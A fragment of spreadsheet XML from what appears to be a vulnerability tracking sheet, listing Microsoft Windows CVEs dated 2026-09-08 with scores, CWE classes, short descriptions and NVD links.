      <c r="G3173" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3173" s="5" t="inlineStr"/>
      <c r="I3173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3173" s="5" t="inlineStr"/>
      <c r="K3173" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3173" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69272</t>
        </is>
      </c>
    </row>
    <row r="3174">
      <c r="A3174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69274</t>
        </is>
      </c>
      <c r="C3174" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3174" s="5" t="inlineStr"/>
      <c r="F3174" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3174" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3174" s="5" t="inlineStr"/>
      <c r="I3174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3174" s="5" t="inlineStr"/>
      <c r="K3174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3174" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69274</t>
        </is>
      </c>
    </row>
    <row r="3175">
      <c r="A3175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69296</t>
        </is>
      </c>
      <c r="C3175" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3175" s="5" t="inlineStr"/>
      <c r="F3175" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3175" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3175" s="5" t="inlineStr"/>
      <c r="I3175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3175" s="5" t="inlineStr"/>
      <c r="K3175" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3175" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69296</t>
        </is>
      </c>
    </row>
    <row r="3176">
      <c r="A3176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69305</t>
        </is>
      </c>
      <c r="C3176" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3176" s="5" t="inlineStr"/>
      <c r="F3176" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3176" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H3176" s="5" t="inlineStr"/>
      <c r="I3176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3176" s="5" t="inlineStr"/>
      <c r="K3176" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3176" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69305</t>
        </is>
      </c>
    </row>
    <row r="3177">
      <c r="A3177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69313</t>
        </is>
      </c>
      <c r="C3177" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3177" s="5" t="inlineStr"/>
      <c r="F3177" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3177" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3177" s="5" t="inlineStr"/>
      <c r="I3177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3177" s="5" t="inlineStr"/>
      <c r="K3177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69313</t>
        </is>
      </c>
    </row>
    <row r="3178">
      <c r="A3178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69314</t>
        </is>
      </c>
      <c r="C3178" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3178" s="5" t="inlineStr"/>
      <c r="F3178" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3178" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3178" s="5" t="inlineStr"/>
      <c r="I3178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3178" s="5" t="inlineStr"/>
      <c r="K3178" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3178" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69314</t>
        </is>
      </c>
    </row>
    <row r="3179">
      <c r="A3179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69336</t>
        </is>
      </c>
      <c r="C3179" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3179" s="5" t="inlineStr"/>
      <c r="F3179" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3179" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H3179" s="5" t="inlineStr"/>
      <c r="I3179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3179" s="5" t="inlineStr"/>
      <c r="K3179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69336</t>
        </is>
      </c>
    </row>
    <row r="3180">
      <c r="A3180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69337</t>
        </is>
      </c>
      <c r="C3180" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3180" s="5" t="inlineStr"/>
      <c r="F3180" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3180" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3180" s="5" t="inlineStr"/>
      <c r="I3180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3180" s="5" t="inlineStr"/>
      <c r="K3180" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3180" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Registry allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69337</t>
        </is>
      </c>
    </row>
    <row r="3181">
      <c r="A3181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69338</t>
        </is>
      </c>
      <c r="C3181" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3181" s="5" t="inlineStr"/>
      <c r="F3181" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3181" s="5" t="inlineStr"/>
      <c r="H3181" s="5" t="inlineStr"/>
      <c r="I3181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3181" s="5" t="inlineStr"/>
      <c r="K3181" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3181" s="5" t="inlineStr">
        <is>
          <t>Use after free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69338</t>
        </is>
      </c>
    </row>
    <row r="3182">
      <c r="A3182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69340</t>
        </is>
      </c>
      <c r="C3182" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3182" s="5" t="inlineStr"/>
      <c r="F3182" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3182" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3182" s="5" t="inlineStr"/>
      <c r="I3182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3182" s="5" t="inlineStr"/>
      <c r="K3182" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L3182" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M3182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69340</t>
        </is>
      </c>
    </row>
    <row r="3183">
      <c r="A3183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="C3183" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3183" s="5" t="inlineStr"/>
      <c r="F3183" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3183" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3183" s="5" t="inlineStr"/>
      <c r="I3183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3183" s="5" t="inlineStr"/>
      <c r="K3183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="3184">
      <c r="A3184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69358</t>
        </is>
      </c>
      <c r="C3184" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3184" s="5" t="inlineStr"/>
      <c r="F3184" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3184" s="5" t="inlineStr"/>
      <c r="H3184" s="5" t="inlineStr"/>
      <c r="I3184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3184" s="5" t="inlineStr"/>
      <c r="K3184" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L3184" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M3184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t>
        </is>
      </c>
    </row>
    <row r="3185">
      <c r="A3185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="C3185" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3185" s="5" t="inlineStr"/>
      <c r="F3185" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3185" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3185" s="5" t="inlineStr"/>
      <c r="I3185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3185" s="5" t="inlineStr"/>
      <c r="K3185" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3185" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="3186">
      <c r="A3186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="C3186" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3186" s="5" t="inlineStr"/>
      <c r="F3186" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3186" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3186" s="5" t="inlineStr"/>
      <c r="I3186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3186" s="5" t="inlineStr"/>
      <c r="K3186" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3186" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="3187">
      <c r="A3187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69384</t>
        </is>
      </c>
      <c r="C3187" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3187" s="5" t="inlineStr"/>
      <c r="F3187" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3187" s="5" t="inlineStr"/>
      <c r="H3187" s="5" t="inlineStr"/>
      <c r="I3187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3187" s="5" t="inlineStr"/>
      <c r="K3187" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3187" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="M3187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t>
        </is>
      </c>
    </row>
    <row r="3188">
      <c r="A3188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="C3188" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3188" s="5" t="inlineStr"/>
      <c r="F3188" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3188" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3188" s="5" t="inlineStr"/>
      <c r="I3188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3188" s="5" t="inlineStr"/>
      <c r="K3188" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3188" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="3189">
      <c r="A3189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="C3189" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3189" s="5" t="inlineStr"/>
      <c r="F3189" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3189" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3189" s="5" t="inlineStr"/>
      <c r="I3189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3189" s="5" t="inlineStr"/>
      <c r="K3189" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3189" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="3190">
      <c r="A3190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="C3190" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3190" s="5" t="inlineStr"/>
      <c r="F3190" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3190" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3190" s="5" t="inlineStr"/>
      <c r="I3190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3190" s="5" t="inlineStr"/>
      <c r="K3190" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3190" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="3191">
      <c r="A3191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="C3191" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3191" s="5" t="inlineStr"/>
      <c r="F3191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3191" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3191" s="5" t="inlineStr"/>
      <c r="I3191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3191" s="5" t="inlineStr"/>
      <c r="K3191" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="L3191" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M3191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="3192">
      <c r="A3192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="C3192" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3192" s="5" t="inlineStr"/>
      <c r="F3192" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3192" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3192" s="5" t="inlineStr"/>
      <c r="I3192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3192" s="5" t="inlineStr"/>
      <c r="K3192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3192" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M3192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="3193">
      <c r="A3193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="C3193" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3193" s="5" t="inlineStr"/>
      <c r="F3193" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3193" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3193" s="5" t="inlineStr"/>
      <c r="I3193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3193" s="5" t="inlineStr"/>
      <c r="K3193" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3193" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="3194">
      <c r="A3194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="C3194" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3194" s="5" t="inlineStr"/>
      <c r="F3194" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3194" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3194" s="5" t="inlineStr"/>
      <c r="I3194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3194" s="5" t="inlineStr"/>
      <c r="K3194" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3194" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="3195">
      <c r="A3195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="C3195" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3195" s="5" t="inlineStr"/>
      <c r="F3195" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3195" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3195" s="5" t="inlineStr"/>
      <c r="I3195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3195" s="5" t="inlineStr"/>
      <c r="K3195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3195" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="3196">
      <c r="A3196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="C3196" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3196" s="5" t="inlineStr"/>
      <c r="F3196" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3196" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3196" s="5" t="inlineStr"/>
      <c r="I3196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3196" s="5" t="inlineStr"/>
      <c r="K3196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="3197">
      <c r="A3197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="C3197" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3197" s="5" t="inlineStr"/>
      <c r="F3197" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3197" s="5" t="inlineStr"/>
      <c r="I3197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3197" s="5" t="inlineStr"/>
      <c r="K3197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3197" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
